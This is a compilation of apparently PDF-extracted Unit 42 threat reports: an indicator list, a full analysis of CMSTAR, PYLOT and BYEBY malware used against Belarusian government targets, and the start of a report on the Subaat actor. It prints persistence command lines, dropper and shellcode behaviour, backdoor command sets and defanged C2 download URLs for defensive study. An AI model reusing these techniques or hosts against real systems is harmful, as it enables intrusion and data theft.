600ddacdf16559135f6e581d41b30d0867aae313fbaf66eb4d18345b2136cdd7
6ccb8a10e253cddd8d4c4b85d19bbb288b56b8174a3f1f2fe1f9151732e1a7da
8b2c44c4b4dc3d7cf1b71bd6fcc37898dcd9573fcf3cb8159add6cb9cfc9651b
9e71d0fdb9874049f310a6ab118ba2559fc1c491ed93c3fd6f250c780e61b6ff
Additional Related Samples
02d74124957b6de4b087a7d12efa01c43558bf6bdaccef9926a022bcffcdcfea
0c5cdbf6f043780dc5fff4b7a977a1874457cc125b4d1da70808bfa720022477
18579d1cc9810ca0b5230e8671a16f9e65b9c9cdd268db6c3535940c30b12f9e
19b23f169606bd390581afe1b27c2c8659d736cbfa4c3e58ed83a287049522f6
1efffd64f2215e2b574b9f8892bbb3ab6e0f98cf0684e479f1a67f0f521ec0fe
440dd79e8e5906f0a73b80bf0dc58f186cb289b4edb9e5bc4922d4e197bce10c
446ce29f6df3ac2692773e0a9b2a973d0013e059543c858554ac8200ba1d09cf
557c63737bf6752eba32bd688eb046c174e53140950e0d91ea609e7f42c80062
5c10b34e99b0f0681f79eaba39e3fe60e1a03ec43faf14b28850be80830722cb
10/12
644c01322628adf8574d69afe25c4eb2cdc0bfa400e689645c2ab80becbacc33
6a34f4ce012e52f5f94c1a163111df8b1c5b96c8dc0836ba600c2da84059c6ad
77a32726af6205d27999b9a564dd7b020dc0a8f697a81a8f597b971140e28976
79fe6576d0a26bd41f1f3a3a7bfeff6b5b7c867d624b004b21fadfdd49e6cb18
8085dae410e54bc0e9f962edc92fa8245a8a65d27b0d06292739458ce59c6ba1
8b21e36aa81ace60c797ac8299c8a80f366cb0f3c703465a2b9a6dbf3e65861e
9c6a23e6662659b3dee96234e51f711dd493aaba93ce132111c56164ad02cf5e
d843f31a1fb62ee49939940bf5a998472a9f92b23336affa7bccfa836fe299f5
dcea917093643bc536191ff70013cb27a0519c07952fbf626b4cc5f3feee2212
dd8c3824c8ffdbf1e16da8cee43da01d43f91ee3cc90a38f50a6cc8d6a778b57
efa2a0bbb69e60337b783db326b62c820b81325d39fb4761c9b575668411e12c
f365a042fbf57ed2fe3fd75b588c46ae358c14441905df1446e67d348bd902bf
f618245e69695f6e985168f5e307fd6dc7e848832bf01c529818cbcfa4089e4a
fa45603334dae86cc72e356df9aa5e21151bb09ffabf86b8dbf5bf42bd2bbadf
fc19a42c423aefb5fdb19b50db52f84e1cbd20af6530e7c7b39435c4c7248cc7
ff4581d0c73bd526efdd6384bc1fb44b856120bc6bbf0098a1fa0de3efff900d
C2 Domains
daedong.or[.]kr
kcnp.or[.]kr
kosic.or[.]kr
wstore[.]lt
xkclub[.]hk
C2 IPv4 Addresses
103.224.82[.]154
180.67.205[.]101
182.70.113[.]138
193.189.144[.]145
199.26.11[.]17
209.105.242[.]64
211.233.13[.]11
211.233.13[.]62
211.236.42[.]52
211.49.171[.]243
218.103.37[.]22
221.138.17[.]152
221.161.82[.]208
11/12
23.115.75[.]188
61.100.180[.]9
61.78.63[.]95
80.153.49[.]82
12/12
Threat Actors Target Government of Belarus Using CMSTAR Trojan
researchcenter.paloaltonetworks.com /2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan/
By Josh Grunzweig and Robert
Falcone
9/28/2017
Palo Alto Networks Unit 42 has identified a series of phishing emails containing updated versions of the previously discussed CMSTAR malware family targeting various government
entities in the country of Belarus.
We first reported on CMSTAR in spear phishing attacks in spring of 2015 and later in 2016.
In this latest campaign, we observed a total of 20 unique emails between June and August of this year that included two new variants of the CMSTAR Downloader. We also discovered two
previously unknown payloads. These payloads contained backdoors that we have named BYEBY and PYLOT respectively.
Figure 1 Diagram of the attack sequence
Phishing Emails
Between June and August of this year, we observed a total of 20 unique emails being sent to the following email addresses:
Email Address
Description
press@mod.mil[.]by
Press Service of the Ministry of Defense of the Republic of Belarus
baranovichi_eu@mod.mil[.]by
Baranovichi Operational Management of the Armed Forces
modmail@mod.mil[.]by
Ministry of Defense of the Republic of Belarus
admin@mod.mil[.]by
Ministry of Defense of the Republic of Belarus
itsc@mod.mil[.]by
Unknown. Likely used by Ministry of Defense of the Republic of Belarus
mineuvs@mod.mil[.]by
Minsk Operational Administration of the Armed Forces
inform@mod.mil[.]by
Unknown. Likely used by Ministry of Defense of the Republic of Belarus
uporov_milcoop@mod.mil[.]by Unknown. Likely used by Ministry of Defense of the Republic of Belarus
video@gpk.gov[.]by
State Border Committee of the Republic of Belarus
armscontrol@mfa.gov[.]by
International Security and Arms Control Department, Ministry of Foreign Affairs
ablameiko@mia[.]by
Unknown. Likely used by the Ministry of Internal Affairs of the Republic of Belarus
These emails contained a series of subject lines, primarily revolving around the topic of
-2017 (
West-2017
), also known in English as Zapad 2017. Zapad 2017 was a series of joint
military exercises conducted by the Armed Forces of the Russian Federation and the Republic of Belarus, held from September 14th to 20th in 2017.
The full list of subject lines is as follows:
Fwd:
-2017 [Translation: Fwd:Preparing for the West-2017]
[Translation: graduation]
-2017 [Translation: To West-2017]
-2017 [Translation: West-2017]
An example of some of the previously mentioned emails may be seen below.
1/12
Figure 2 Phishing email sent to Belarus government (1/2)
Figure 3 Phishing email sent to Belarus government (2/2)
Decoy Documents
We observed that the attachments used in these emails contained a mixture of file types. RTF documents, Microsoft Word documents, and a RAR archive. The RAR archive contained a
series of images, a decoy document, and a Microsoft Windows executable within it. The executable has a .scr file extension, and is designed to look like a Windows folder, as seen below:
Figure 4 Payload disguising itself as a Microsoft Windows folder
2/12
The rough translation of the folder and file names above are
Preparations for large-scale West-2017 exercises in this format are being held for the first time.
Within the actual folder, there
are a series of JPG images, as well as a decoy document with a title that is translated to
Thousands of Russian and Belarusian military are involved in the training of the rear services.
Figure 5 Embedded images and decoy document within RAR
The decoy document contains the following content:
Figure 6 Decoy document within RAR
The other RTF and Word documents used additional decoy documents, which can be seen below.
3/12
Figure 7 Decoy document with translation (1/2)
Figure 8 Decoy document with translation (2/2)
While we observed different techniques being used for delivery, all attachments executed a variant of the CMSTAR malware family. We observed minor changes between variants, which
we discuss in the CMSTAR Variations and Payloads section of the blog post.
The Word documents, which we track as Werow, employ malicious macros for their delivery. More information about these macros may be found in the Appendix of the blog post.
Additionally, we have included a script that extracts these embedded payloads that can also be found in the Appendix.
The RTF documents made use of CVE-2015-1641. This vulnerability, patched in 2015, allows attackers to execute malicious code when these specially crafted documents are opened
within vulnerable instances of Microsoft Word. The payload for these samples is embedded within them and obfuscated using a 4-byte XOR key of 0xCAFEBABE. We have included a
script that can be used to extract the underlying payload of these RTFs statically that can be found in the Appendix.
The SCR file mentioned previously drops a CMSTAR DLL and runs it via an external call to rundll32.exe.
CMSTAR Variations and Payloads
In total, we observed three variations of CMSTAR in these recent attacks against Belarusian targets. The biggest change observed between them looks to be minor modifications made to
the string obfuscation routine. A very simple modification to the digit used in subtraction was modified between the variants, as shown below:
4/12
Figure 9 String obfuscation modifications between CMSTAR variants
The older variation, named CMSTAR.A, was discussed in a previous blog post entitled,
Digital Quartermaster Scenario Demonstrated in Attacks Against the Mongolian Government .
The CMSTAR.B variant was witnessed using both a different mutex from CMSTAR.A, as well as a slightly modified string obfuscation routine. The mutexes used by CMSTAR ensure that
only one instance of the malware runs at a time. The CMSTAR.C variant used the same mutex as CMSTAR.B, however, again used another slightly modified string obfuscation routine.
We found all CMSTAR variants using the same obfuscation routine when I payload was downloaded from a remote server. We have included a tool to extract mutex and C2 information
from all three CMSTAR variants, as well as a tool to decode the downloaded payload: both may be found in the Scripts section.
An example of CMSTAR downloading its payload may be found below:
Figure 10 Example HTTP download by CMSTAR
When expanding the research to identify additional CMSTAR.B and CMSTAR.C variants, we identified a total of 31 samples. Of these 31 samples, we found two unique payloads served
from three of the C2 URLS
One of which was downloaded from a sample found in the phishing attacks previously described. Both payloads contained previously unknown malware
families. We have named the payload found in the email campaign PYLOT, and the malware downloaded from the additional CMSTAR samples BYEBY.
Both malware families acted as backdoors, allowing the attackers to execute commands on the victim machine, as well as a series of other functions. More information about these
individual malware families may be found in the appendix.
Conclusion
During the course of this research, we identified a phishing campaign consisting of 20 unique emails targeting the government of Belarus. The ploys used in these email and decoy
documents revolved around a joint strategic military exercise of the Armed Forces of the Russian Federation and the Republic of Belarus, which took place between September 14th and
September 20th of this year. While looking at the emails in question, we observed two new variants of the CMSTAR malware family. Between the samples identified and others we found
while expanding our research scope, we identified two previously unknown malware families.
Palo Alto customers are protected from this threat in the following ways:
Tags have been created in AutoFocus to track CMSTAR, BYEBY, and PYLOT
All observed samples are identified as malicious in WildFire
Domains observed to act as C2s have been flagged as malicious
Traps 4.1 identifies and blocks the CVE-2015-1641 exploit used in these documents
Traps 4.1 blocks the macros used in the malicious Word documents
A special thanks to Tom Lancaster for his assistance on this research.
Appendix
Werow Macro Analysis
The attacker used the same macro dropper all of the observed Microsoft Word documents we analyzed for this campaign. It begins by building the following path strings:
%APPDATA%\d.doc
%APPDATA%\Microsoft\Office\WinCred.acl
The
d.doc
path will be used to store a copy of the Word document, while the
WinCred.acl
will contain the dropped payload, which is expected to be a DLL.
5/12
Figure 11 Macro used to drop CMSTAR
Werow uses rudimentary obfuscation to hide and re-assemble the following strings:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WinCred
rundll32 %APPDATA%\Microsof\Office\WinCred.acl ,WinCred
These strings will be used at the end of the macro
s execution to ensure persistence via the Run registry key.
The malware proceeds to read an included overlay within the original Word document from a given offset. This data is decoded using and XOR operation, as well as an addition operation.
It can be represented in Python as follows:
6/12
def decrypt_xor(data, key, key_offset):
output = ""
seed = ord(key)
for d in data:
ord_d = ord(d)
if ord_d != 0 and ord_d != seed:
nvalue = ord_d ^ seed
seed = (seed + key_offset) % 0x100
output += chr(nvalue)
else:
output += d
return output
Once this overlay is decoded, it is written to the
WinCred.acl
file and loaded with the
WinCred
export. A script has been provided in the Scripts section that, in conjunction with oletools,
can statically extract the embedded DLL payload from these documents.
RTF Shellcode Analysis
The RTF documents delivered in this attack campaign appear to be created by the same builder. All of the RTF files attempt to exploit CVE-2015-1641 to execute shellcode on the targeted
system. Please reference https://technet.microsoft.com/en-us/library/security/ms15-033.aspx for more information.
The shellcode executed after successful exploitation begins by resolving the API functions it requires by enumerating the API functions within loaded modules in the current process. It
then builds the following list of values:
The shellcode then enumerates the API functions, subjects them to a ROR7 hashing routine and XORs the resulting hash with 0x10ADBEEF. It uses the result of this arithmetic to
compare with the list of values above to find the API functions it requires to carry out its functionality.
ROR7
ROR7^0x10ADBEEF
API Func
1a22f51
110f91be
WinExec
741f8dc4
64b2332b
WriteFile
94e43293 84498c7c
CreateFileA
daa7fe52
ca0a40bd
UnmapViewOfFile
dbacbe43
cb0100ac
SetFilePointer
ec496a9e
fce4d471
GetEnvironmentVariableA
ff0d6657
efa0d8b8
CloseHandle
After resolving the API functions, the shellcode then begins searching for the embedded payload and decoy within the initial RTF file. It does so by searching the RTF file for three
delimiters, specifically 0xBABABABABABA, 0xBBBBBBBB and 0xBCBCBCBC, which the shellcode uses to find the encrypted payload and decoy. The shellcode then decrypts the
payload by XOR
ing four bytes at at time with the key 0xCAFEBABE, and decrypts the decoy by XOR
ing four bytes at a time using the key 0xBAADF00D. Here is a visual representation
of the delimiters and embedded files:
After decrypting the payload, it saves the file to the following location:
%APPDATA%\Microsoft\Office\OutL12.pip
The shellcode then creates the following registry key to automatically run the payload each time the system starts:
Software\Microsoft\Windows\CurrentVersion\Run : Microsoft
The shellcode saves the following command to this autorun key, which will execute the OutL12.pip payload, specifically calling its
WinCred
exported function:
rundll32.exe
%APPDATA\Roaming\Microsoft\Office\OutL12.pip
,WinCred
The shellcode will then overwrite the original delivery document with the decrypted decoy contents and open the new document.
PYLOT Analysis
7/12
This malware family was named via a combination of the DLLs original name of
pilot.dll
, along with the fact it downloads files with a Python (.py) file extension.
PYLOT begins by being loaded as a DLL with the ServiceMain export. It proceeds to create the following two folders within the %TEMP% path:
KB287640
KB887209
PYLOT continues to load and decode an embedded resource file. This file contains configuration information that is used by the malware throughout its execution. The following script,
written in Python, may be used to decode this embedded resource object:
import sys
import hexdump
file = sys.argv[1]
fh = open(file, 'rb')
fdata = list(fh.read())
fh.close()
fdata_len = len(fdata)
c = fdata_len-1
output = ""
while c > 1:
fdata[c] = chr( ord(fdata[c]) ^ ord(fdata[c-2]) )
c -= 1
fdata = ''.join(fdata)
hexdump.hexdump(fdata)
Looking at the decoded data, we see the following:
Figure 12 Decoded embedded configuration information
The malware continues to collect the following information from the victim computer:
Computer name
8/12
IP addresses present on the machine
MAC addresses
Microsoft Windows version information
Windows code page identifier information
This information is used to generate a unique hash for the victim machine. PYLOT then begins entering its C2 handler routine, where it will use HTTP for communication with the remote
host.
Data sent to the remote C2 server is encrypted using RC4 with the previously shown key of
BBidRotnqQpHfpRTi8cR.
It is then further obfuscated by base64-encoding this encrypted
string. An example of this HTTP request containing this data can be seen below.
Figure 13 HTTP request made by PYLOT to remote server
The decrypted data sent in the request above is as follows. Note that all of this custom data format has not been fully identified, however, we
re able to see various strings, including the
embedded configuration string of
fGAka0001
, as well as the victim hash of
100048048.
Figure 14 Decrypted data sent by PYLOT to remote server
The base64-encoded string at the end of the data contains the collected victim machine information from earlier, separated by a
delimiter.
The remote C2 server responds using the same data format. An example response can be seen below.
Figure 15 Response from remote C2 server
The decoded data at the end of the response contains various URIs to be used by the malware to receive commands, as well as other information that has yet to be fully researched.
/duakzu/furs.py|/ugvrf/pvoi.py|/tydfw/pld.py|/bpnij/syau.py|/plugin/plugin.py|eycHhHKVQUnuAwtNchvYjScGYMtVMzMqYmxBmCEwieQpKgsokpvrxknPQRvnkOHDywCImVZxHxRdvlePjgnbPXs
9/12
A number of commands have been identified within PYLOT, including the following:
Download batch script
Run batch script
Delete file
Rename file
Execute file
Download file
Upload file
BYEBY Analysis
BYEBY was named based on a string within the malware itself. Most strings found within this malware are concatenated to 6 characters. One such example was an instance where a
debug string contained
BYE BY
, which was likely a concatenated form of the phrase
BYE BYE
This malware is loaded as a DLL, with an export name of ServiceMain. When the malware is initially loaded, it begins by checking to see if it is running within either of the following paths:
[SYSTEM32]\svchost.exe
[SYSTEM32]\rundll32.exe
If it finds itself not running in either location, it will immediately exit. This is likely a technique used to bypass various sandboxing systems. Should it find itself running as svchost.exe, it will
write the current timestamp and a value of
V09SS010
(Base64 Decoded:
WORKMN
) to a file named
vmunisvc.cab
within the user
s local %TEMP% folder. This file acts as a lot file and
is written to frequently throughout the malware
s execution.
When the malware runs within the context of svchost.exe, it bypasses the installation routines and immediately enters the C2 handler.
When BYEBY is run within the context of rundll32.exe, it expects itself to be running for the first time. As such, it will register itself as a service with a name of
VideoSrv.
After this service
is created, BYEBY proceeds to enter it
s C2 handler function in a new thread.
BYEBY uses TLS for network communication, connecting to the following host on port 443:
oeiowidfla22[.]com
After the initial connection is established, BYEBY will collect the following system information and upload it to the remote C2:
Hostname
IP Address
Embedded String of
WinVideo
Major Windows Version
Minor Windows Version
Embedded String of
6.1.7603.16000
The malware is configured to accept a number of commands. These appear to be Base64-encoded strings that, when decoded, provide their true meaning. Only the beginning of the
commands are checked. The Base64-decoded strings have been included for the benefit of the reader.
aGVsbG8h [Decoded: hello!]
R09PREJZ [Decoded: GOODBY]
TElTVCBE [Decoded: LIST D]
U1RBUlRD [Decoded: STARTC]
Q09NTUFO [Decoded: COMMAN]
VFJBTlNG [Decoded: TRANSF]
RVhFQ1VU [Decoded: EXECUT]
A mapping of commands and their descriptions has been provided:
Command
Description
aGVsbG8h
Authenticate with the remote C2 server.
R09PREJZ
Close socket connection with remote server.
TElTVCBE
List drives on the victim machine.
U1RBUlRD
Start an interactive shell on the victim machine.
Q09NTUFO
Execute a command in the interactive shell
VFJBTlNG
Upload or download files to the victim machine.
RVhFQ1VU
Execute command in a new process.
Scripts
We created multiple scripts during the course of our research. We are sharing them here to assist other researchers or defenders that encounter this malware.
extract_cmstar_doc.py
Script to extract the embedded CMSTAR payload from Word documents.
extract_cmstar_rtf.py
Script to extract the embedded CMSTAR payload from RTFs.
extract_cmstar_strings.py
Script to identify possible mutex and C2 strings from CMSTAR variants.
decode_cmstar_payload.py
Script to decode a payload downloaded by CMSTAR.
Indicators of Compromise
10/12
CMSTAR Variants Identified in Phishing Campaign
65d5ef9aa617e7060779bc217a42372e99d59dc88f8ea2f3b9f45aacf3ba7209
2a0169c72c84e6d3fa49af701fd46ee7aaf1d1d9e107798d93a6ca8df5d25957
4da6ce5921b0dfff9045ada7e775c1755e6ea44eab55da7ccc362f2a70ce26a6
2008ec82cec0b62bdb4d2cea64ff5a159a4327a058dfd867f877536389a72fb6
cecd72851c265f885ff02c60cbc3e6cbf1a40b298274761f623dfa44782a01f8
d8c0f8ecdeceba83396c98370f8f458ea7f7a935aabbcc3d41b80d4e85746357
2c8267192b196bf8a92c8b72d52096e46e307fa4d4dafdc030d3e0f5b4145e9e
2debf12b1cb1291cbd096b24897856948734fa62fd61a1f24d379b4224bda212
79b30634075896084135b9891c42fca8a59db1c0c731e445940671efab9a0b61
b0065fc16ae785834908f024fb3ddd4d9d62b29675859a8e737e3b949e85327a
16697c95db5add6c1c23b2591b9d8eec5ed96074d057b9411f0b57a54af298d5
6843d183b41b6b22976fc8d85e448dcc4d2e0bd2c159e6d966bfd4afa1cd9221
3c3efa89d1dd39e1112558af38ba656e048be842a3bedb7933cdd4210025f791
b2bebb381bc3722304ab1a21a21e082583bf6b88b84e7f65c4fdda48971c20a2
09890dc8898b99647cdc1cceb97e764b6a88d55b5a520c8d0ea3bfd8f75ed83b
fd22973451b88a4d10d9f485baef7f5e7a6f2cb9ce0826953571bd8f5d866c2a
CMSTAR Download Locations in Phishing Campaign
http://45.77.60[.]138/YXza9HkKWzqtXlt.dat
http://45.77.60[.]138/mePVDjnAZsYCw5j.dat
http://45.77.60[.]138/UScHrzGWbXb01gv.dat
http://45.76.80[.]32/tYD7jzfVNZqMfye.dat
http://45.77.60[.]138/liW0ecpxEWCfIgU.dat
http://45.77.60[.]138/ezD19AweVIj5NaH.dat
http://45.77.60[.]138/jVJlw3wp379neaJ.dat
http://108.61.175[.]110/tlhXVFeBvT64LC9.dat
http://45.77.60[.]138/HJDBvnJ7wc4S5qZ.dat
http://45.77.60[.]138/JUmoT4Pbw6U2xcj.dat
http://108.61.175[.]110/oiUfxZfej29MAbF.dat
http://45.77.60[.]138/cw1PlY308OpfVeZ.dat
http://45.77.60[.]138/VFdSKlgCAZD7mmp.dat
http://45.77.60[.]138/c2KoCT5OHcVwGi7.dat
http://45.77.60[.]138/3kK24dXFYRgM6Ac.dat
http://45.77.60[.]138/WsEeRyHEhLO1kUm.dat
PYLOT SHA256
7e2c9e4acd05bc8ca45263b196e80e919ff60890a872bdc0576735a566369c46
PYLOT C2
wait.waisttoomuchmind[.]com
BYEBY SHA256
383a2d8f421ad2f243cbc142e9715c78f867a114b037626c2097cb3e070f67d6
BYEBY C2
oeiowidfla22[.]com
CMSTAR.B SHA256
8609360b43498e296e14237d318c96c58dce3e91b7a1c608cd146496703a7fac
f0f2215457200bb3003eecb277bf7e3888d16edcf132d88203b27966407c7dc3
aecf53a3a52662b441703e56555d06c9d3c61bddf4d3b23d9da02abbe390c609
960a17797738dc0bc5623c74b6f8a5d74375f6d18d20ba18775f26a43898bae6
e37c045418259ecdc07874b85e7b688ba53f5a7dc989db19d7e8c440300bd574
75ea6e8dfaf56fb35f35cb043bd77aef9e2c7d46f3e2a0454dff0952a09c134f
a65e01412610e5ed8fde12cb78e6265a18ef78d2fd3c8c14ed8a3d1cef17c91d
7170b104367530ae837daed466035a8be719fdb17423fc01da9c0ded74ca6ad1
11/12
13acddf9b7c2daafd815cbfa75fbb778a7074a6f90277e858040275ae61a252b
625ed818a25c63d8b2c264d0f5bd96ba5ad1c702702d8ffaa4e0e93e5f411fac
a56cd758608034c90e81e4d4f1fe383982247d6aeffd74a1dd98d84e9b56afdf
a4b969b93f7882ed2d15fd10970c4720961e42f3ae3fced501c0a1ffa3896ff5
e833bbb79ca8ea1dbeb408520b97fb5a1b691d5a5f9c4f9deabecb3787b47f73
8e9136d6dc7419469c959241bc8745af7ba51c7b02a12d04fec0bc4d3f7dcdf0
CMSTAR.B Download Locations
http://108.61.175[.]110/tlhXVFeBvT64LC9.dat
http://104.238.188[.]211/gl7xljvn3fqGt3u.dat
http://45.77.60[.]138/c2KoCT5OHcVwGi7.dat
http://108.61.175[.]110/gkMmqVvZ7gGGxpY.dat
http://108.61.175[.]110/z_gaDZyeZXvScQ6.dat
http://108.61.175[.]110/bDtzGVtqgiJU9PI.dat
http://45.77.60[.]138/liW0ecpxEWCfIgU.dat
http://45.77.60[.]138/JUmoT4Pbw6U2xcj.dat
http://108.61.175[.]110/oiUfxZfej29MAbF.dat
http://108.61.103[.]123/jvZfZ0gdTWtr46y.dat
http://108.61.103[.]123/06JcD5jz5dSHVAy.dat
http://108.61.103[.]123/nj3dsMMpyQQDBF3.dat
http://108.61.103[.]123/fHZvWtBGlFvs2Nr.dat
http://45.77.60[.]138/w57E8dktKb9UQyV.dat
CMSTAR.C SHA256
85e06a2beaa4469f13ca58d5d09fec672d3d8962a7adad3c3cb74f3f9ef1fed4
b8ef93227b59e6c8d3a1494b4860d15be819fae17b57fd56bfff9a51b7972ff0
9e6fdbbc2371ac8bc6db3b878475ed0b0af8950d50a4652df688e778beb87397
4e38e627ae21f1a85aa963ca990a66cf75789b450605fdca2f31ee6f0f8ab8f2
f4ff0ca7f2ea2a011a2a4615d9b488b7806ff5dd61577a9e3a9860f2980e7fc0
8de3fa2614b1767cfd12936c5adf4423ef25ea60800fa170752266e0ca063274
38197abde967326568e101b65203c2efa75500e5f3c084b6dd08fd1ba1430726
726df91a395827d11dc433854b3f19b3e28eac4feff329e0bdad93890b03af84
5703565ec64d72eb693b9fafcba5951e937c8ee38829948e9518b7d226f81c10
d0544a3e6d1b34b8b4e976c7fc62d4500f28f617e2f549d9a3e590b71b1f9cc5
2a8e5551b9905e907da7268aba50fcbc526cfd0549ff2e352f9f4d1d71bf32a7
d7cd6f367a84f6d5cf5ffb3c2537dd3f48297bd45a8f5a4c50190f683b7c9e90
8f7294072a470b886791a7a32eedf0f0505aaecec154626c6334d986957086e4
6419255d017b217fe984d3439694eb96806d06c7ea41a422298650969028c08c
CMSTAR.C Download Locations
http://45.77.58[.]49/54xfapkezW64xDE.dat
http://45.77.58[.]49/54xfapkezW64xDE.dat
http://45.77.62[.]181/naIXl13kqeV7Y2j.dat
http://45.77.58[.]160/9EkCWYA3OtDbz1l.dat
http://45.77.58[.]160/8h5NPYB5fAn301E.dat
http://45.77.58[.]160/9EkCWYA3OtDbz1l.dat
http://45.77.60[.]138/3kK24dXFYRgM6Ac.dat
http://45.77.60[.]138/ezD19AweVIj5NaH.dat
http://45.77.60[.]138/VFdSKlgCAZD7mmp.dat
http://45.77.60[.]138/HJDBvnJ7wc4S5qZ.dat
http://45.77.60[.]138/jVJlw3wp379neaJ.dat
http://45.77.60[.]138/YXza9HkKWzqtXlt.dat
http://45.77.60[.]138/UScHrzGWbXb01gv.dat
http://45.77.60[.]138/WsEeRyHEhLO1kUm.dat
12/12
Tracking Subaat: Targeted Phishing Attack Leads to
Threat Actor
s Repository
researchcenter.paloaltonetworks.com/2017/10/unit42-tracking-subaat-targeted-phishing-attacks-point-leader-threatactors-repository/
By Unit 42
October 27, 2017
In mid-July, Palo Alto Networks Unit 42 identified a small targeted phishing campaign aimed at
a government organization. While tracking the activities of this campaign, we identified a
repository of additional malware, including a web server that was used to host the payloads
used for both this attack as well as others. We
ll discuss how we discovered it, as well as
possible attribution towards the individual behind these attacks.
The Initial Attack
Beginning on July 16, 2017, Unit 42 observed a small wave of phishing emails targeting a USbased government organization. We observed a total of 43 emails with the following subject
lines:
Invention
Invention Event
Within the 43 emails we observed, we found that three unique files were delivered, which
consisted of two RTFs and a Microsoft Excel file. Both RTFs exploited CVE-2012-0158 and
acted as downloaders to ultimately deliver the QuasarRAT malware family. The downloaders
made use of the same shellcode, with minor variances witnessed between them. Additionally,
the RTFs made use of heavy obfuscation within the documents themselves, making it more
difficult to extract the embedded shellcode.
The Microsoft Excel file contained malicious macros that resulted in dropping and
subsequently executing Crimson Downloader. The Excel document contained a UserForm that
in turn contained three text boxes. The embedded payload was hex-encoded and split
between these three text boxes. The malicious macro extracted this information from the text
boxes, dropped it to a specific location, and eventually executed the Crimson Downloader
payload.
Detailed information about these malware samples may be found in the appendix of this blog.
A curious aspect of this campaign is the use of Crimson Downloader in this email campaign.
To date, we have not widely seen Crimson Downloader being used: in fact, we have only seen
123 unique instances of this malware family being used to date. Readers may recall a previous
blog post from March 2016 that discussed Crimson Downloader. That blog post discussed
relationships with both Operation Transparent Tribe and Operation C-Major, which were both
targeted campaigns that made use of Crimson Downloader aimed at diplomatic and political
1/17
targets. The connections we observed in this research leads us to believe there might be a
connection between this most recent activity we observed and those campaigns. However,
there is not enough evidence to say so decisively.
Expanding the Scope from the Original Attacks
When looking at the various malware samples encountered as we analyzed this campaign, we
identified a total of three hosts/IP addresses, as shown in the following chart:
5.189.157[.]215
Crimson Downloader connects to this IP address.
115.186.136[.]237
QuasarRAT connects to this IP address.
subaat[.]com (Resolves to 23.92.211[.]186)
RTFs download QuasarRAT from this host.
Starting with the first IP address that was used by Crimson Downloader, we can see that this
address appears to be located in Germany and is almost exclusively associated with this
malware family. Based on our telemetry, this IP address has exclusively been used to
communicate with Crimson Downloader. We observed a total of 16 unique Crimson
Downloader samples starting in May of this year.
Moving onto the second IP address of 115.186.136[.]237, we see that this IP address belongs
to a Pakistan-based Internet Service Provider (ISP), based in Islamabad, that services both
residential and commercial customers.
The subaat[.]com domain has historic WHOIS information from early 2016 that references a
Pakistani location, as seen in the image below. Additionally, it uses pkwebhost[.]net for its
DNS, which is a Pakistan-based hosting provider.
2/17
Figure 1 Historical WHOIS information for subaat[.]com from early 2016
The references to Pakistan in conjunction with the use of Crimson Downloader, which has
historically been associated with Pakistan actors, is certainly interesting.
The RTFs we observed in the original email campaign downloaded QuasarRAT from
http://subaat[.]com/files/sp.exe. Checking this host led us to discover that directory listings
were enabled. We were able to discover a large repository of malware on this open server.
3/17
Figure 2 Open directory listing of subaat[.]com
Since beginning this research, this domain has been suspended by the hosting provider.
However, it returned in mid-August, hosting both a malicious APK and a known instance of
QuasarRAT.
4/17
Figure 3 Subaat returns after suspension
In total, we found 84 unique malware payloads hosted on this server, in addition to a number
of miscellaneous scripts. The chart below shows the malware families we identified:
Figure 4 Malware families identified in web server repository
As we can see from the above chart, a wealth of different malware families were stored on this
web server. Many of these malware families are considered to be commodity malware, or
widely used by criminals. Palo Alto Networks has reported on many of these families in the
past, including LuminosityLink, QuasarRAT, and DarkComet to name a few. The large number
of commodity malware families paints a very different picture from the original attack that made
use of Crimson Downloader, which is not a widely used malware.
A full list of SHA256 hashes associated with these samples may be found in the appendix.
5/17
One thing that caught our eye was the large number of LuminosityLink malware samples
stored on this server. Looking at the embedded configuration settings for these samples, we
see that they are all similar. The following example shows one of these configurations. A script
written in a previous blog post was used to generate the output below, it can be downloaded
here.
Figure 5 Embedded configuration within LuminosityLink sample
The email address shown above is used to register a customer
s copy of LuminosityLink. All
samples using this registered builder contain this email address. We found all 20 of the
identified LuminosityLink samples contained this same email address. The primary domain
shown above is registered to 115.186.136[.]237, which is the IP address used by QuasarRAT
for Command and Control (C2) communications. Looking at other samples found within the
web server repository, we identified a number of malware families communicating with this IP
address, including the following:
QuasarRAT
LuminosityLink
Meterpreter
NJRAT
RevengeRAT
RemcosRAT
We also discovered that the email address discussed above was being used by an account on
the popular HackingForum web forum service. The account in question that claims to own this
email address is none other than
Subaat
6/17
Figure 6 Subaat user mentioning the hotmail email address on HackForums
Looking at this user
s profile below, we can see their posting history: a total of 14 posts in the
past two years. We also see a date of birth of 2/24/1990, stating that the individual is 27 years
old.
Figure 7 Subaat profile information
A quick look at the posting history indicates that this person was inactive starting around
December 2016, but returned to posting in early July of this year. This is in line with the
campaign witnessed against a US-based government organization that took place on July 16th.
7/17
The posts look to be related to various Office exploit builders and crypters. This again is in line
with both the campaign we witnessed as well as the various malware we identified on
subaat[.]com.
Figure 8 Subaat posting history
A Look Behind the Scenes
Looking at logs for the subaat webserver between July 1st and July 20th shows the IP address
of 115.186.136[.]237 uploading and interacting with a number of malicious files. We found
interactions with a total of 64 unique files during this period. Below is a chart showing the
attacker at this IP address interacting with some of the more popular malware families that
have been identified.
8/17
Figure 9 Interaction between attacker and web server
As we can see from the chart above, a spike of activity took place in the July 11th to July 16th
timeframe. This again is consistent with the email campaign that took place in the midst of this
period. A number of malware families have been used by this specific attacker, and many of
them are configured to communicate with 115.186.136[.]237 as the C2.
Conclusion
What started out as a simple look into what appeared to be a targeted phishing campaign
turned into much more. By the end of this research endeavor, we have identified a server
hosting a large number of malware samples that has been primarily used by one specific IP
address. This IP address not only interacted with this web server, but also acted as a C2
server for many of these malware families. While looking at malware associated with this
actor, we discovered an email address that is tied to a user account on HackForums that has a
name consistent with the domain used to host the actor
s malware.
We saw similarities this campaign and both the Operation Transparent Tribe and Operation CMajor campaigns. Additionally, there is marginal evidence that suggests that the attacker may
be based in Pakistan, which is again in line Operation Transparent Tribe. However, the overall
evidence is not conclusive, and there is insufficient proof to say decisively that this is the same
threat actor.
Palo Alto Networks customers are protected by this threat in a number of ways:
All identified samples are flagged as malicious within the Palo Alto Networks platform
All domains identified within this research have been appropriately marked as malicious
9/17
Traps correctly identified and blocks the exploits using CVE-2012-0158 and CVE-20170199
Appendix
Analysis of Malicious RTF Documents
The two identified samples that were used in a campaign against a US-based government
organization has the following SHA256 hashes:
0ade053b355eca7ae1fccea01fe14ff8d56a9d1703d01b3c00f7a09419357301
